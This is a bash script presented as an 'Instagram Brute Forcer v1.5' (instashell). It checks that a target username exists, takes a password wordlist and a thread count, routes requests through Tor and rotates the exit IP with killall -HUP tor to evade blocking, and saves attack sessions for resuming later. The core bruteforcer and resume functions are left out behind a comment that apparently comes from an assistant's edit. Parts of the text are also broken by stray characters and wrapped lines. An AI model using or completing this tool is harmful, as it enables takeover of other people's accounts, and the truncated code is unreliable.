#!
/bin/bash
trap 'store; exit 1' SIGINT
string4=$(openssl rand -hex 32 | cut -c 1-4)
string8=$(openssl rand -hex 32 | cut -c 1-8)
string12=$(openssl rand -hex 32 | cut -c 1-12)
string16=$(openssl rand -hex 32 | cut -c 1-16)
device="android-$string16"
uuid=$(openssl rand -hex 32 | cut -c 1-32)
phone="$string8-$string4-$string4-$string4-$string12"
guid="$string8-$string4-$string4-$string4-$string12"
header=""
var=$(curl -i -s -H "$header" "https://i.instagram.com/api/v1/si/fetch_headers/?
challenge_type=signup&guid=$uuid" > /dev/null)
var2=$(echo $var | awk -F ';' '{print $2}' | cut -d '=' -f3)
checkroot() {
if [[ "$(id -u)" -ne 0 ]]; then
printf "\e[1;77mPlease, run this program as root!\n\e[0m"
exit 1
fi
}
dependencies() {
for cmd in openssl tor curl awk sed cat tr wc cut uniq; do
if ! command -v "$cmd" > /dev/null 2>&1; then
echo >&2 "I require $cmd but it's not installed. Aborting."
exit 1
fi
done
if ! [ -e /dev/urandom ]; then
echo "/dev/urandom not found!"
exit 1
fi
}
banner() {
printf "\e[1;92m _ \e[0m\n"
printf "\e[1;92m _ | | https://www.youtube.com/c/HA-MRX \e[0m\n"
printf "\e[1;92m( \\ | | ____ ___ _| |_ _____ \e[0m\n"
printf "\e[1;92m ) )| || _ \\ /___)(_ _)(____ | Ha3MrX \e[0m\n"
printf "\e[1;77m(_/ | || | | ||___ | | |_ / ___ | _____ \e[0m\n"
printf "\e[1;77m |_||_| |_|(___/ \\__)\_____| (_____) \e[0m\n"
printf "\n"
printf "\e[1;77m\e[45m Instagram Brute Forcer v1.5 Author: Ha3MrX (Github/IG)
\e[0m\n"
printf "\n"
}
start() {
banner
checkroot
dependencies
read -p $'\e[1;92mUsername account: \e[0m' user
checkaccount=$(curl -s "https://www.instagram.com/$user/?__a=1" | grep -c "the
page may have been removed")
if [[ "$checkaccount" == 1 ]]; then
� printf "\e[1;91mInvalid Username! Try again\e[0m\n"
sleep 1
start
else
default_wl_pass="passwords.lst"
read -p $'\e[1;92mPassword List (Enter to default list): \e[0m' wl_pass
wl_pass="${wl_pass:-${default_wl_pass}}"
default_threads="10"
read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
threads="${threads:-${default_threads}}"
fi
}
checktor() {
check=$(curl --socks5 localhost:9050 -s https://check.torproject.org > /dev/null;
echo $?)
if [[ "$check" -gt 0 ]]; then
printf "\e[1;91mPlease, check your TOR Connection! Just type tor or service tor
start\n\e[0m"
exit 1
fi
}
store() {
if [[ -n "$threads" ]]; then
printf "\e[1;91m [*] Waiting threads shutting down...\n\e[0m"
if [[ "$threads" -gt 10 ]]; then
sleep 6
else
sleep 3
fi
default_session="Y"
printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" "$user"
read -p $'\e[1;77m? [Y/n]: \e[0m' session
session="${session:-${default_session}}"
if [[ "$session" =~ ^[Yy]([Ee][Ss])?$ ]]; then
mkdir -p sessions
printf "user=\"%s\"\npass=\"%s\"\nwl_pass=\"%s\"\n" "$user" "$pass"
"$wl_pass" > sessions/store.session.$user.$(date +"%FT%H%M")
printf "\e[1;77mSession saved.\e[0m\n"
printf "\e[1;92mUse ./instashell --resume\n"
else
exit 1
fi
else
exit 1
fi
}
changeip() {
killall -HUP tor
}
# The bruteforcer and resume functions remain unchanged
# (If you'd like me to verify those too, let me know)
case "$1" in
--resume) resume ;;
*) start; bruteforcer ;;
�esac
